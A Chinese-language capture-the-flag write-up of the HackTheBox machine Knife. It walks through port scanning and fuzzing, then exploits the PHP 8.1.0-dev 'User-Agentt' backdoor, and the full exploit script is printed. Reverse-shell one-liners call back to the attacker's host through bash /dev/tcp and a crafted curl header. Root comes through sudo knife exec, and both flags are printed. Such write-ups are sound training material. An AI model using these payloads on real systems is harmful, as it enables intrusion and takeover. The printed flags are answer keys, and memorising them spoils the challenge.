HTB：Knife[WriteUP]

连接至HTB服务器并启动靶机

1.How many TCP ports are open on Knife?

2.What version of PHP is running on the webserver?

并没有我们需要的信息，接着使用浏览器访问靶机80端口

尝试使用ffuf对靶机Web进行一下目录FUZZ

使用curl访问该文件获取HTTP头部信息

3.What HTTP request header can be added to get code execution in this version of PHP?

4.What user is the web server running as?

5.Submit the flag located in the james user's home directory.

方法1：

方法2：

USER_FLAG：81932511682d38c0c0a57d6a569bdabe

6.What is the full path to the binary on this machine that james can run as root?

7.Submit the flag located in root's home directory.

ROOT_FLAG：946e9d8e966925a815886926f1634323

连接至HTB服务器并启动靶机

靶机IP：10.10.10.242

分配IP：10.10.16.4

1.How many TCP ports are open on Knife?

使用fscan对靶机进行端口扫描：

┌──(root㉿kali)-[/home/kali/Desktop]
└─# fscan -nopoc -nobr -no -h 10.10.10.242

   ___                              _
/ _ \     ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_| \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
10.10.10.242:22 open
10.10.10.242:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://10.10.10.242       code:200 len:5815   title:Emergent Medical Idea
已完成 2/2
[*] 扫描结束,耗时: 567.879776ms

由fscan扫描结果可见，靶机开放端口：22、80共2个端口

2.What version of PHP is running on the webserver?

使用nmap对靶机22、80端口进行脚本、服务信息扫描：

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 22,80 -sCV 10.10.10.242
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-17 07:20 EDT
Nmap scan report for 10.10.10.242
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.88 seconds

并没有我们需要的信息，接着使用浏览器访问靶机80端口

发现还是啥信息都没有，URL也没有跳转和重定位

尝试使用ffuf对靶机Web进行一下目录FUZZ

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# ffuf -u http://10.10.10.242/FUZZ -w common.txt

        /'___\ /'___\           /'___\
       /\ \__/ /\ \__/ __ __ /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\ \ \____/ \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

:: Method           : GET
:: URL              : http://10.10.10.242/FUZZ
:: Wordlist         : FUZZ: /home/kali/Desktop/dictionary/common.txt
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 504ms]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 523ms]
.hta                    [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 523ms]
                        [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 523ms]
index.php               [Status: 200, Size: 5815, Words: 646, Lines: 221, Duration: 538ms]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 562ms]
:: Progress: [4614/4614] :: Job [1/1] :: 104 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

由爆破结果可见，靶机存在文件index.php

使用curl访问该文件获取HTTP头部信息

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# curl -I http://10.10.10.242/index.php
HTTP/1.1 200 OK
Date: Thu, 17 Oct 2024 11:56:43 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8

由回显信息可见，X-Powered-By信息展示PHP版本为：8.1.0-dev

3.What HTTP request header can be added to get code execution in this version of PHP?

对该PHP服务器版本进行漏洞检索：

┌──(root㉿kali)-[/home/kali/Desktop/dictionary]
└─# searchsploit 8.1.0-dev
-------------------------------------------- ---------------------------------------------------------
Exploit Title | Path
-------------------------------------------- ---------------------------------------------------------
PHP 8.1.0-dev - 'User-Agentt' Remote Code E | php/webapps/49933.py
-------------------------------------------- ---------------------------------------------------------
Shellcodes: No Results

将该漏洞Exp复制到当前目录：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m php/webapps/49933.py
Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
    Codes: N/A
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/49933.py

查看该Exp文件内容：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# strings 49933.py
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
#     - https://hub.docker.com/r/phpdaily/php
#    - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
#    - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
#   - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
#!/usr/bin/env python3
import os
import re
import requests
host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
        while 1:
            cmd = input("$ ")
            headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers = headers, allow_redirects = False)
            current_page = response.text
            stdout = current_page.split('<!DOCTYPE html>',1)
            text = print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        exit
else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit

通过对该Exp分析可见，添加请求头：User-Agentt可使其RCE命令执行

4.What user is the web server running as?

在该脚本添加User_Agentt处，在cmd左右两侧加上两个反斜杠将斜杠转义，方便正常弹shell：

接着直接使用python3对该Exp脚本运行：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49933.py
Enter the full host url:
http://10.10.10.242

Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$ whoami
james

由命令whoami回显可见，该Web服务器以james用户运行

5.Submit the flag located in the james user's home directory.

本地使用nc开启监听：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425

方法1：

使用上文的Exp脚本，直接执行反弹shell命令：

bash -c "bash -i >& /dev/tcp/10.10.16.4/1425 0>&1"

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python 49933.py
Enter the full host url:
http://10.10.10.242

Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.

$ bash -c "bash -i >& /dev/tcp/10.10.16.4/1425 0>&1"

方法2：

使用curl访问靶机，并添加请求头User-Agentt，发包后反弹shell：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://10.10.10.242/index.php -H "User-Agentt: zerodiumsystem(\"bash -c 'bash -i >& /dev/tcp/10.10.16.4/1425 0>&1'\");"

本地nc侧收到请求：

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.242] 56402
bash: cannot set terminal process group (958): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ whoami
whoami
james

查找user_flag位置：

find / -name 'user.txt' 2>/dev/null

查看user_flag内容：

cat /home/james/user.txt

james@knife:/$ find / -name 'user.txt' 2>/dev/null
find / -name 'user.txt' 2>/dev/null
/home/james/user.txt
james@knife:/$ cat /home/james/user.txt
cat /home/james/user.txt
81932511682d38c0c0a57d6a569bdabe

USER_FLAG：81932511682d38c0c0a57d6a569bdabe

6.What is the full path to the binary on this machine that james can run as root?

查看该用户组信息：

id

查看该用户能sudo运行的文件：

sudo -l

james@knife:/$ id
id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

由输出可见，该用户可sudo运行的文件完整路径为：/usr/bin/knife

7.Submit the flag located in root's home directory.

通过GTFOBins查询该文件getshell命令：

直接sudo运行，尝试切换root用户：

sudo knife exec -E 'exec "/bin/sh"'

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
whoami
root

切换成交互shell：

script /dev/null -c bash

检索root_flag位置：

find / -name 'root.txt' 2>/dev/null

查看root_flag内容：

cat /root/root.txt

script /dev/null -c bash
Script started, file is /dev/null
root@knife:/# find / -name 'root.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null
/root/root.txt
root@knife:/# cat /root/root.txt
cat /root/root.txt
946e9d8e966925a815886926f1634323